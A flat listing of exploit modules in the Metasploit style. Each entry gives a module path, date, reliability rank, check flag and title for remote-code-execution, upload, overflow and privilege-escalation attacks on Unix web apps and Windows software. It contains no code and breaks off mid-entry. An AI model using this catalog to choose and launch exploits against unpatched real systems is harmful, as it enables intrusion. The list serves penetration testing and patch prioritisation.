unix/http/ctek_skyrouter 2011-09-08 average No CTEK SkyRouter 4200 and 4300 Command Execution + unix/http/dell_kace_k1000_upload 2014-03-07 excellent Yes Dell KACE K1000 File Upload + unix/http/epmp1000_get_chart_cmd_shell 2017-12-18 excellent Yes Cambium ePMP1000 'get_chart' Shell via Command Injection (v3.1-3.5-RC7) + unix/http/epmp1000_ping_cmd_shell 2015-11-28 excellent Yes Cambium ePMP1000 'ping' Shell via Command Injection (up to v2.5) + unix/http/freepbx_callmenum 2012-03-20 manual No FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution + unix/http/lifesize_room 2011-07-13 excellent No LifeSize Room Command Injection + unix/http/pfsense_clickjacking 2017-11-21 normal No Clickjacking Vulnerability In CSRF Error Page pfSense + unix/http/pfsense_graph_injection_exec 2016-04-18 excellent No pfSense authenticated graph status RCE + unix/http/pfsense_group_member_exec 2017-11-06 excellent Yes pfSense authenticated group member RCE + unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection + unix/http/tnftp_savefile 2014-10-28 excellent No tnftp "savefile" Arbitrary Command Execution + unix/http/twiki_debug_plugins 2014-10-09 excellent Yes TWiki Debugenableplugins Remote Code Execution + unix/http/vmturbo_vmtadmin_exec_noauth 2014-06-25 excellent Yes VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution + unix/http/xdebug_unauth_exec 2017-09-17 excellent Yes xdebug Unauthenticated OS Command Execution + unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution + unix/local/at_persistence 1997-01-01 excellent Yes at(1) Persistence + unix/local/chkrootkit 2014-06-04 manual Yes Chkrootkit Local Privilege Escalation + unix/local/emacs_movemail 1986-08-01 excellent Yes Emacs movemail Privilege Escalation + unix/local/exim_perl_startup 2016-03-10 excellent Yes Exim "perl_startup" Privilege Escalation + unix/local/netbsd_mail_local 2016-07-07 excellent No NetBSD mail.local Privilege Escalation + unix/local/setuid_nmap 2012-07-19 excellent Yes Setuid Nmap Exploit + unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution + unix/misc/polycom_hdx_auth_bypass 2013-01-18 normal Yes Polycom Command Shell Authorization Bypass + unix/misc/polycom_hdx_traceroute_exec 2017-11-12 excellent Yes Polycom Shell HDX Series Traceroute Command Execution + unix/misc/qnx_qconn_exec 2012-09-04 excellent Yes QNX qconn Command Execution + unix/misc/spamassassin_exec 2006-06-06 excellent No SpamAssassin spamd Remote Command Execution + unix/misc/xerox_mfp 2012-03-07 good No Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability + unix/misc/zabbix_agent_exec 2009-09-10 excellent No Zabbix Agent net.tcp.listen Command Injection + unix/polycom_hdx_auth_bypass 2013-01-18 normal Yes Polycom Command Shell Authorization Bypass + unix/smtp/clamav_milter_blackhole 2007-08-24 excellent No ClamAV Milter Blackhole-Mode Remote Code Execution + unix/smtp/exim4_string_format 2010-12-07 excellent No Exim4 string_format Function Heap Buffer Overflow + unix/smtp/morris_sendmail_debug 1988-11-02 average Yes Morris Worm sendmail Debug Mode Shell Escape + unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock) + unix/sonicwall/sonicwall_xmlrpc_rce 2016-07-22 excellent Yes SonicWall Global Management System XMLRPC set_time_zone Unauth RCE + unix/ssh/array_vxag_vapv_privkey_privesc 2014-02-03 excellent No Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution + unix/ssh/tectia_passwd_changereq 2012-12-01 excellent Yes Tectia SSH USERAUTH Change Request Password Reset Vulnerability + unix/webapp/actualanalyzer_ant_cookie_exec 2014-08-28 excellent Yes ActualAnalyzer 'ant' Cookie Command Execution + unix/webapp/arkeia_upload_exec 2013-09-16 excellent Yes Western Digital Arkeia Remote Code Execution + unix/webapp/awstats_configdir_exec 2005-01-15 excellent Yes AWStats configdir Remote Command Execution + unix/webapp/awstats_migrate_exec 2006-05-04 excellent Yes AWStats migrate Remote Command Execution + unix/webapp/awstatstotals_multisort 2008-08-26 excellent Yes AWStats Totals multisort Remote Command Execution + unix/webapp/barracuda_img_exec 2005-09-01 excellent Yes Barracuda IMG.PL Remote Command Execution + unix/webapp/base_qry_common 2008-06-14 excellent No BASE base_qry_common Remote File Include + unix/webapp/basilic_diff_exec 2012-06-28 excellent Yes Basilic 1.5.14 diff.php Arbitrary Command Execution + unix/webapp/cacti_graphimage_exec 2005-01-15 excellent No Cacti graph_view.php Remote Command Execution + unix/webapp/cakephp_cache_corruption 2010-11-15 excellent No CakePHP Cache Corruption Code Execution + unix/webapp/carberp_backdoor_exec 2013-06-28 great Yes Carberp Web Panel C2 Backdoor Remote PHP Code Execution + unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution + unix/webapp/clipbucket_upload_exec 2013-10-04 excellent Yes ClipBucket Remote Code Execution + unix/webapp/coppermine_piceditor 2008-01-30 excellent Yes Coppermine Photo Gallery picEditor.php Command Execution + unix/webapp/datalife_preview_exec 2013-01-28 excellent Yes DataLife Engine preview.php PHP Code Injection + unix/webapp/dogfood_spell_exec 2009-03-03 excellent Yes Dogfood CRM spell.php Remote Command Execution + unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution + unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection + unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution + unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE + unix/webapp/egallery_upload_exec 2012-07-08 excellent Yes EGallery PHP File Upload Vulnerability + unix/webapp/elfinder_php_connector_exiftran_cmd_injection 2019-02-26 excellent Yes elFinder PHP Connector exiftran Command Injection + unix/webapp/flashchat_upload_exec 2013-10-04 excellent Yes FlashChat Arbitrary File Upload + unix/webapp/foswiki_maketext 2012-12-03 excellent Yes Foswiki MAKETEXT Remote Command Execution + unix/webapp/freepbx_config_exec 2014-03-21 excellent Yes FreePBX config.php Remote Code Execution + unix/webapp/generic_exec 1993-11-14 excellent No Generic Web Application Unix Command Execution + unix/webapp/get_simple_cms_upload_exec 2014-01-04 excellent Yes GetSimpleCMS PHP File Upload Vulnerability + unix/webapp/google_proxystylesheet_exec 2005-08-16 excellent Yes Google Appliance ProxyStyleSheet Command Execution + unix/webapp/graphite_pickle_exec 2013-08-20 excellent Yes Graphite Web Unsafe Pickle Handling + unix/webapp/guestbook_ssi_exec 1999-11-05 excellent No Matt Wright guestbook.pl Arbitrary Command Execution + unix/webapp/hastymail_exec 2011-11-22 excellent Yes Hastymail 2.1.1 RC1 Command Injection + unix/webapp/havalite_upload_exec 2013-06-17 excellent Yes Havalite CMS Arbitary File Upload Vulnerability + unix/webapp/horde_unserialize_exec 2013-06-27 excellent Yes Horde Framework Unserialize PHP Code Execution + unix/webapp/hybridauth_install_php_exec 2014-08-04 manual Yes HybridAuth install.php PHP Code Execution + unix/webapp/instantcms_exec 2013-06-26 excellent Yes InstantCMS 1.6 Remote PHP Code Execution + unix/webapp/invision_pboard_unserialize_exec 2012-10-25 excellent Yes Invision IP.Board unserialize() PHP Code Execution + unix/webapp/joomla_akeeba_unserialize 2014-09-29 excellent Yes Joomla Akeeba Kickstart Unserialize Remote Code Execution + unix/webapp/joomla_comfields_sqli_rce 2017-05-17 excellent Yes Joomla Component Fields SQLi Remote Code Execution + unix/webapp/joomla_comjce_imgmanager 2012-08-02 excellent Yes Joomla Component JCE File Upload Remote Code Execution + unix/webapp/joomla_contenthistory_sqli_rce 2015-10-23 excellent Yes Joomla Content History SQLi Remote Code Execution + unix/webapp/joomla_media_upload_exec 2013-08-01 excellent Yes Joomla Media Manager File Upload Vulnerability + unix/webapp/joomla_tinybrowser 2009-07-22 excellent Yes Joomla 1.5.12 TinyBrowser File Upload Code Execution + unix/webapp/jquery_file_upload 2018-10-09 excellent Yes blueimp's jQuery (Arbitrary) File Upload + unix/webapp/kimai_sqli 2013-05-21 average Yes Kimai v0.9.2 'db_restore.php' SQL Injection + unix/webapp/libretto_upload_exec 2013-06-14 excellent Yes LibrettoCMS File Manager Arbitary File Upload Vulnerability + unix/webapp/maarch_letterbox_file_upload 2015-02-11 excellent Yes Maarch LetterBox Unrestricted File Upload + unix/webapp/mambo_cache_lite 2008-06-14 excellent No Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include + unix/webapp/mitel_awc_exec 2010-12-12 excellent No Mitel Audio and Web Conferencing Command Injection + unix/webapp/moinmoin_twikidraw 2012-12-30 manual Yes MoinMoin twikidraw Action Traversal File Upload + unix/webapp/mybb_backdoor 2011-10-06 excellent Yes myBB 1.6.4 Backdoor Arbitrary Command Execution + unix/webapp/nagios3_history_cgi 2012-12-09 great Yes Nagios3 history.cgi Host Command Execution + unix/webapp/nagios3_statuswml_ping 2009-06-22 excellent No Nagios3 statuswml.cgi Ping Command Execution + unix/webapp/nagios_graph_explorer 2012-11-30 excellent Yes Nagios XI Network Monitor Graph Explorer Component Command Injection + unix/webapp/narcissus_backend_exec 2012-11-14 excellent Yes Narcissus Image Configuration Passthru Vulnerability + unix/webapp/open_flash_chart_upload_exec 2009-12-14 great Yes Open Flash Chart v2 Arbitrary File Upload + unix/webapp/openemr_sqli_privesc_upload 2013-09-16 excellent Yes OpenEMR 4.1.1 Patch 14 SQLi Privilege Escalation Remote Code Execution + unix/webapp/openemr_upload_exec 2013-02-13 excellent Yes OpenEMR PHP File Upload Vulnerability + unix/webapp/opensis_modname_exec 2012-12-04 excellent Yes OpenSIS 'modname' PHP Code Execution + unix/webapp/openview_connectednodes_exec 2005-08-25 excellent No HP Openview connectedNodes.ovpl Remote Command Execution + unix/webapp/openx_banner_edit 2009-11-24 excellent Yes OpenX banner-edit.php File Upload PHP Code Execution + unix/webapp/oracle_vm_agent_utl 2010-10-12 excellent Yes Oracle VM Server Virtual Server Agent Command Injection + unix/webapp/oscommerce_filemanager 2009-08-31 excellent No osCommerce 2.2 Arbitrary PHP Code Execution + unix/webapp/pajax_remote_exec 2006-03-30 excellent No PAJAX Remote Command Execution + unix/webapp/php_charts_exec 2013-01-16 excellent Yes PHP-Charts v1.0 PHP Code Execution Vulnerability + unix/webapp/php_eval 2008-10-13 manual Yes Generic PHP Code Evaluation + unix/webapp/php_include 2006-12-17 normal Yes PHP Remote File Include Generic Code Execution + unix/webapp/php_vbulletin_template 2005-02-25 excellent Yes vBulletin misc.php Template Name Arbitrary Code Execution + unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution + unix/webapp/phpbb_highlight 2004-11-12 excellent No phpBB viewtopic.php Arbitrary Code Execution + unix/webapp/phpcollab_upload_exec 2017-09-29 excellent Yes phpCollab 2.5.1 Unauthenticated File Upload + unix/webapp/phpmyadmin_config 2009-03-24 excellent No PhpMyAdmin Config File Code Injection + unix/webapp/piwik_superuser_plugin_upload 2017-02-05 excellent No Piwik Superuser Plugin Upload + unix/webapp/projectpier_upload_exec 2012-10-08 excellent Yes Project Pier Arbitrary File Upload Vulnerability + unix/webapp/projectsend_upload_exec 2014-12-02 excellent Yes ProjectSend Arbitrary File Upload + unix/webapp/qtss_parse_xml_exec 2003-02-24 excellent No QuickTime Streaming Server parse_xml.cgi Remote Execution + unix/webapp/redmine_scm_exec 2010-12-19 excellent No Redmine SCM Repository Arbitrary Command Execution + unix/webapp/seportal_sqli_exec 2014-03-20 excellent Yes SePortal SQLi Remote Code Execution + unix/webapp/simple_e_document_upload_exec 2014-01-23 excellent Yes Simple E-Document Arbitrary File Upload + unix/webapp/sixapart_movabletype_storable_exec 2015-02-11 good Yes SixApart MovableType Storable Perl Code Execution + unix/webapp/skybluecanvas_exec 2014-01-28 excellent Yes SkyBlueCanvas CMS Remote Code Execution + unix/webapp/sphpblog_file_upload 2005-08-25 excellent Yes Simple PHP Blog Remote Command Execution + unix/webapp/spip_connect_exec 2012-07-04 excellent Yes SPIP connect Parameter PHP Injection + unix/webapp/squash_yaml_exec 2013-08-06 excellent Yes Squash YAML Code Execution + unix/webapp/squirrelmail_pgp_plugin 2007-07-09 manual No SquirrelMail PGP Plugin Command Execution (SMTP) + unix/webapp/sugarcrm_rest_unserialize_exec 2016-06-23 excellent No SugarCRM REST Unserialize PHP Code Execution + unix/webapp/sugarcrm_unserialize_exec 2012-06-23 excellent No SugarCRM unserialize() PHP Code Execution + unix/webapp/tikiwiki_graph_formula_exec 2007-10-10 excellent Yes TikiWiki tiki-graph_formula Remote PHP Code Execution + unix/webapp/tikiwiki_jhot_exec 2006-09-02 excellent Yes TikiWiki jhot Remote Command Execution + unix/webapp/tikiwiki_unserialize_exec 2012-07-04 excellent No Tiki Wiki unserialize() PHP Code Execution + unix/webapp/tikiwiki_upload_exec 2016-07-11 excellent Yes Tiki Wiki Unauthenticated File Upload Vulnerability + unix/webapp/trixbox_langchoice 2008-07-09 manual Yes Trixbox langChoice PHP Local File Inclusion + unix/webapp/tuleap_rest_unserialize_exec 2017-10-23 excellent Yes Tuleap 9.6 Second-Order PHP Object Injection + unix/webapp/tuleap_unserialize_exec 2014-11-27 excellent Yes Tuleap PHP Unserialize Code Execution + unix/webapp/twiki_history 2005-09-14 excellent Yes TWiki History TWikiUsers rev Parameter Command Execution + unix/webapp/twiki_maketext 2012-12-15 excellent Yes TWiki MAKETEXT Remote Command Execution + unix/webapp/twiki_search 2004-10-01 excellent Yes TWiki Search Function Arbitrary Command Execution + unix/webapp/vbulletin_vote_sqli_exec 2013-03-25 excellent Yes vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection + unix/webapp/vicidial_manager_send_cmd_exec 2013-10-23 excellent Yes VICIdial Manager Send OS Command Injection + unix/webapp/vicidial_user_authorization_unauth_cmd_exec 2017-05-26 excellent Yes VICIdial user_authorization Unauthenticated Command Execution + unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution + unix/webapp/webmin_upload_exec 2019-01-17 excellent Yes Webmin Upload Authenticated RCE + unix/webapp/webtester_exec 2013-10-17 excellent Yes WebTester 5.x Command Execution + unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload + unix/webapp/wp_advanced_custom_fields_exec 2012-11-14 excellent Yes WordPress Plugin Advanced Custom Fields Remote File Inclusion + unix/webapp/wp_ajax_load_more_file_upload 2015-10-10 excellent Yes Wordpress Ajax Load More PHP Upload Vulnerability + unix/webapp/wp_asset_manager_upload_exec 2012-05-26 excellent Yes WordPress Asset-Manager PHP File Upload Vulnerability + unix/webapp/wp_creativecontactform_file_upload 2014-10-22 excellent Yes Wordpress Creative Contact Form Upload Vulnerability + unix/webapp/wp_downloadmanager_upload 2014-12-03 excellent Yes Wordpress Download Manager (download-manager) Unauthenticated File Upload + unix/webapp/wp_easycart_unrestricted_file_upload 2015-01-08 excellent No WordPress WP EasyCart Unrestricted File Upload + unix/webapp/wp_foxypress_upload 2012-06-05 excellent Yes WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution + unix/webapp/wp_frontend_editor_file_upload 2012-07-04 excellent Yes Wordpress Front-end Editor File Upload + unix/webapp/wp_google_document_embedder_exec 2013-01-03 normal Yes WordPress Plugin Google Document Embedder Arbitrary File Disclosure + unix/webapp/wp_holding_pattern_file_upload 2015-02-11 excellent Yes WordPress Holding Pattern Theme Arbitrary File Upload + unix/webapp/wp_inboundio_marketing_file_upload 2015-03-24 excellent Yes Wordpress InBoundio Marketing PHP Upload Vulnerability + unix/webapp/wp_infusionsoft_upload 2014-09-25 excellent Yes Wordpress InfusionSoft Upload Vulnerability + unix/webapp/wp_lastpost_exec 2005-08-09 excellent No WordPress cache_lastpostdate Arbitrary Code Execution + unix/webapp/wp_mobile_detector_upload_execute 2016-05-31 excellent Yes WordPress WP Mobile Detector 3.5 Shell Upload + unix/webapp/wp_nmediawebsite_file_upload 2015-04-12 excellent Yes Wordpress N-Media Website Contact Form Upload Vulnerability + unix/webapp/wp_optimizepress_upload 2013-11-29 excellent Yes WordPress OptimizePress Theme File Upload Vulnerability + unix/webapp/wp_photo_gallery_unrestricted_file_upload 2014-11-11 excellent Yes WordPress Photo Gallery Unrestricted File Upload + unix/webapp/wp_phpmailer_host_header 2017-05-03 average Yes WordPress PHPMailer Host Header Command Injection + unix/webapp/wp_pixabay_images_upload 2015-01-19 excellent Yes WordPress Pixabay Images PHP Code Upload + unix/webapp/wp_platform_exec 2015-01-21 excellent No WordPress Platform Theme File Upload Vulnerability + unix/webapp/wp_property_upload_exec 2012-03-26 excellent Yes WordPress WP-Property PHP File Upload Vulnerability + unix/webapp/wp_reflexgallery_file_upload 2012-12-30 excellent Yes Wordpress Reflex Gallery Upload Vulnerability + unix/webapp/wp_revslider_upload_execute 2014-11-26 excellent Yes WordPress RevSlider File Upload and Execute Vulnerability + unix/webapp/wp_slideshowgallery_upload 2014-08-28 excellent Yes Wordpress SlideShow Gallery Authenticated File Upload + unix/webapp/wp_symposium_shell_upload 2014-12-11 excellent Yes WordPress WP Symposium 14.11 Shell Upload + unix/webapp/wp_total_cache_exec 2013-04-17 excellent Yes WordPress W3 Total Cache PHP Code Execution + unix/webapp/wp_worktheflow_upload 2015-03-14 excellent Yes Wordpress Work The Flow Upload Vulnerability + unix/webapp/wp_wpshop_ecommerce_file_upload 2015-03-09 excellent Yes WordPress WPshop eCommerce Arbitrary File Upload Vulnerability + unix/webapp/wp_wptouch_file_upload 2014-07-14 excellent Yes WordPress WPTouch Authenticated File Upload + unix/webapp/wp_wysija_newsletters_upload 2014-07-01 excellent Yes Wordpress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload + unix/webapp/xoda_file_upload 2012-08-21 excellent Yes XODA 0.4.5 Arbitrary PHP File Upload Vulnerability + unix/webapp/zeroshell_exec 2013-09-22 excellent Yes ZeroShell Remote Code Execution + unix/webapp/zimbra_lfi 2013-12-06 excellent Yes Zimbra Collaboration Server LFI + unix/webapp/zoneminder_packagecontrol_exec 2013-01-22 excellent Yes ZoneMinder Video Server packageControl Command Execution + unix/webapp/zpanel_username_exec 2013-06-07 excellent Yes ZPanel 10.0.0.2 htpasswd Module Username Command Execution + unix/x11/x11_keyboard_exec 2015-07-10 excellent No X11 Keyboard Command Injection + windows/antivirus/ams_hndlrsvc 2010-07-26 excellent No Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution + windows/antivirus/ams_xfr 2009-04-28 excellent No Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution + windows/antivirus/symantec_endpoint_manager_rce 2014-02-24 excellent Yes Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution + windows/antivirus/symantec_iao 2009-04-28 good No Symantec Alert Management System Intel Alert Originator Service Buffer Overflow + windows/antivirus/symantec_rtvscan 2006-05-24 good No Symantec Remote Management Buffer Overflow + windows/antivirus/symantec_workspace_streaming_exec 2014-05-12 excellent Yes Symantec Workspace Streaming ManagementAgentServer.putFile XMLRPC Request Arbitrary File Upload + windows/antivirus/trendmicro_serverprotect 2007-02-20 good No Trend Micro ServerProtect 5.58 Buffer Overflow + windows/antivirus/trendmicro_serverprotect_createbinding 2007-05-07 good No Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow + windows/antivirus/trendmicro_serverprotect_earthagent 2007-05-07 good No Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow + windows/arkeia/type77 2005-02-18 good Yes Arkeia Backup Client Type 77 Overflow (Win32) + windows/backdoor/energizer_duo_payload 2010-03-05 excellent No Energizer DUO USB Battery Charger Arucer.dll Trojan Code Execution + windows/backupexec/name_service 2004-12-16 average No Veritas Backup Exec Name Service Overflow + windows/backupexec/remote_agent 2005-06-22 great Yes Veritas Backup Exec Windows Remote Agent Overflow + windows/backupexec/ssl_uaf 2017-05-10 normal Yes Veritas/Symantec Backup Exec SSL NDMP Connection Use-After-Free + windows/brightstor/ca_arcserve_342 2008-10-09 average No Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow + windows/brightstor/discovery_tcp 2005-02-14 average Yes CA BrightStor Discovery Service TCP Overflow + windows/brightstor/discovery_udp 2004-12-20 average Yes CA BrightStor Discovery Service Stack Buffer Overflow + windows/brightstor/etrust_itm_alert 2008-04-04 average No Computer Associates Alert Notification Buffer Overflow + windows/brightstor/hsmserver 2007-09-27 great No CA BrightStor HSM Buffer Overflow + windows/brightstor/lgserver 2007-01-31 average No CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow + windows/brightstor/lgserver_multi 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow + windows/brightstor/lgserver_rxrlogin 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow + windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer rxsSetDataGrowthScheduleAndFilter Buffer Overflow + windows/brightstor/lgserver_rxsuselicenseini 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow + windows/brightstor/license_gcr 2005-03-02 average No CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow + windows/brightstor/mediasrv_sunrpc 2007-04-25 average No CA BrightStor ArcServe Media Service Stack Buffer Overflow + windows/brightstor/message_engine 2007-01-11 average No CA BrightStor ARCserve Message Engine Buffer Overflow + windows/brightstor/message_engine_72 2010-10-04 average No CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow + windows/brightstor/message_engine_heap 2006-10-05 average No CA BrightStor ARCserve Message Engine Heap Overflow + windows/brightstor/sql_agent 2005-08-02 average No CA BrightStor Agent for Microsoft SQL Overflow + windows/brightstor/tape_engine 2006-11-21 average No CA BrightStor ARCserve Tape Engine Buffer Overflow + windows/brightstor/tape_engine_0x8a 2010-10-04 average No CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow + windows/brightstor/universal_agent 2005-04-11 average No CA BrightStor Universal Agent Overflow + windows/browser/adobe_cooltype_sing 2010-09-07 great No Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow + windows/browser/adobe_flash_avm2 2014-02-05 normal No Adobe Flash Player Integer Underflow Remote Code Execution + windows/browser/adobe_flash_casi32_int_overflow 2014-10-14 great No Adobe Flash Player casi32 Integer Overflow + windows/browser/adobe_flash_copy_pixels_to_byte_array 2014-09-23 great No Adobe Flash Player copyPixelsToByteArray Method Integer Overflow + windows/browser/adobe_flash_domain_memory_uaf 2014-04-14 great No Adobe Flash Player domainMemory ByteArray Use After Free + windows/browser/adobe_flash_filters_type_confusion 2013-12-10 normal No Adobe Flash Player Type Confusion Remote Code Execution + windows/browser/adobe_flash_mp4_cprt 2012-02-15 normal No Adobe Flash Player MP4 'cprt' Overflow + windows/browser/adobe_flash_otf_font 2012-08-09 normal No Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow + windows/browser/adobe_flash_pcre 2014-11-25 normal No Adobe Flash Player PCRE Regex Vulnerability + windows/browser/adobe_flash_regex_value 2013-02-08 normal No Adobe Flash Player Regular Expression Heap Overflow + windows/browser/adobe_flash_rtmp 2012-05-04 normal No Adobe Flash Player Object Type Confusion + windows/browser/adobe_flash_sps 2011-08-09 normal No Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow + windows/browser/adobe_flash_uncompress_zlib_uninitialized 2014-11-11 good No Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory + windows/browser/adobe_flash_worker_byte_array_uaf 2015-02-02 great No Adobe Flash Player ByteArray With Workers Use After Free + windows/browser/adobe_flashplayer_arrayindexing 2012-06-21 great No Adobe Flash Player AVM Verification Logic Array Indexing Code Execution + windows/browser/adobe_flashplayer_avm 2011-03-15 good No Adobe Flash Player AVM Bytecode Verification Vulnerability + windows/browser/adobe_flashplayer_flash10o 2011-04-11 normal No Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability + windows/browser/adobe_flashplayer_newfunction 2010-06-04 normal No Adobe Flash Player "newfunction" Invalid Pointer Use + windows/browser/adobe_flatedecode_predictor02 2009-10-08 good No Adobe FlateDecode Stream Predictor 02 Integer Overflow + windows/browser/adobe_geticon 2009-03-24 good No Adobe Collab.getIcon() Buffer Overflow + windows/browser/adobe_jbig2decode 2009-02-19 good No Adobe JBIG2Decode Heap Corruption + windows/browser/adobe_media_newplayer 2009-12-14 good No Adobe Doc.media.newPlayer Use After Free Vulnerability + windows/browser/adobe_shockwave_rcsl_corruption 2010-10-21 normal No Adobe Shockwave rcsL Memory Corruption + windows/browser/adobe_toolbutton 2013-08-08 normal No Adobe Reader ToolButton Use After Free + windows/browser/adobe_utilprintf 2008-02-08 good No Adobe util.printf() Buffer Overflow + windows/browser/advantech_webaccess_dvs_getcolor 2014-07-17 normal No Advantech WebAccess dvs.ocx GetColor Buffer Overflow + windows/browser/aim_goaway 2004-08-09 great No AOL Instant Messenger goaway Overflow + windows/browser/aladdin_choosefilepath_bof 2012-04-01 normal No Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow + windows/browser/amaya_bdo 2009-01-28 normal No Amaya Browser v11.0 'bdo' Tag Overflow + windows/browser/aol_ampx_convertfile 2009-05-19 normal No AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow + windows/browser/aol_icq_downloadagent 2006-11-06 excellent No America Online ICQ ActiveX Control Arbitrary File Download and Execute + windows/browser/apple_itunes_playlist 2005-01-11 normal No Apple ITunes 4.7 Playlist Buffer Overflow + windows/browser/apple_quicktime_marshaled_punk 2010-08-30 great No Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution + windows/browser/apple_quicktime_mime_type 2012-11-07 normal No Apple QuickTime 7.7.2 MIME Type Buffer Overflow + windows/browser/apple_quicktime_rdrf 2013-05-22 normal No Apple Quicktime 7 Invalid Atom Length Buffer Overflow + windows/browser/apple_quicktime_rtsp 2007-01-01 normal No Apple QuickTime 7.1.3 RTSP URI Buffer Overflow + windows/browser/apple_quicktime_smil_debug 2010-08-12 good No Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow + windows/browser/apple_quicktime_texml_font_table 2012-11-07 normal No Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow + windows/browser/ask_shortformat 2007-09-24 normal No Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow + windows/browser/asus_net4switch_ipswcom 2012-02-17 normal No ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow + windows/browser/athocgov_completeinstallation 2008-02-15 normal No AtHocGov IWSAlerts ActiveX Control Buffer Overflow + windows/browser/autodesk_idrop 2009-04-02 normal No Autodesk IDrop ActiveX Control Heap Memory Corruption + windows/browser/aventail_epi_activex 2010-08-19 normal No SonicWALL Aventail epi.dll AuthCredential Format String + windows/browser/awingsoft_web3d_bof 2009-07-10 average No AwingSoft Winds3D Player SceneURL Buffer Overflow + windows/browser/awingsoft_winds3d_sceneurl 2009-11-14 excellent No AwingSoft Winds3D Player 3.5 SceneURL Download and Execute + windows/browser/baofeng_storm_onbeforevideodownload 2009-04-30 normal No BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow + windows/browser/barcode_ax49 2007-06-22 normal No RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow + windows/browser/blackice_downloadimagefileurl 2008-06-05 excellent No Black Ice Cover Page ActiveX Control Arbitrary File Download + windows/browser/c6_messenger_downloaderactivex 2008-06-03 excellent No Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute + windows/browser/ca_brightstor_addcolumn 2008-03-16 normal No CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow + windows/browser/chilkat_crypt_writefile 2008-11-03 excellent No Chilkat Crypt ActiveX WriteFile Unsafe Method + windows/browser/cisco_anyconnect_exec 2011-06-01 excellent No Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute + windows/browser/cisco_playerpt_setsource 2012-03-22 normal No Cisco Linksys PlayerPT ActiveX Control Buffer Overflow + windows/browser/cisco_playerpt_setsource_surl 2012-07-17 normal No Cisco Linksys PlayerPT ActiveX Control SetSource sURL Argument Buffer Overflow + windows/browser/cisco_webex_ext 2017-01-21 great No Cisco WebEx Chrome Extension RCE (CVE-2017-3823) + windows/browser/citrix_gateway_actx 2011-07-14 normal No Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability + windows/browser/clear_quest_cqole 2012-05-19 normal No IBM Rational ClearQuest CQOle Remote Code Execution + windows/browser/communicrypt_mail_activex 2010-05-19 great No CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow + windows/browser/creative_software_cachefolder 2008-05-28 normal No Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow + windows/browser/crystal_reports_printcontrol 2010-12-14 normal No Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow + windows/browser/dell_webcam_crazytalk 2012-03-19 normal No Dell Webcam CrazyTalk ActiveX BackImage Vulnerability + windows/browser/dxstudio_player_exec 2009-06-09 excellent No Worldweaver DX Studio Player shell.execute() Command Execution + windows/browser/ea_checkrequirements 2007-10-08 normal No Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow + windows/browser/ebook_flipviewer_fviewerloading 2007-06-06 normal No FlipViewer FViewerLoading ActiveX Control Buffer Overflow + windows/browser/enjoysapgui_comp_download 2009-04-15 excellent No EnjoySAP SAP GUI ActiveX Control Arbitrary File Download + windows/browser/enjoysapgui_preparetoposthtml 2007-07-05 normal No EnjoySAP SAP 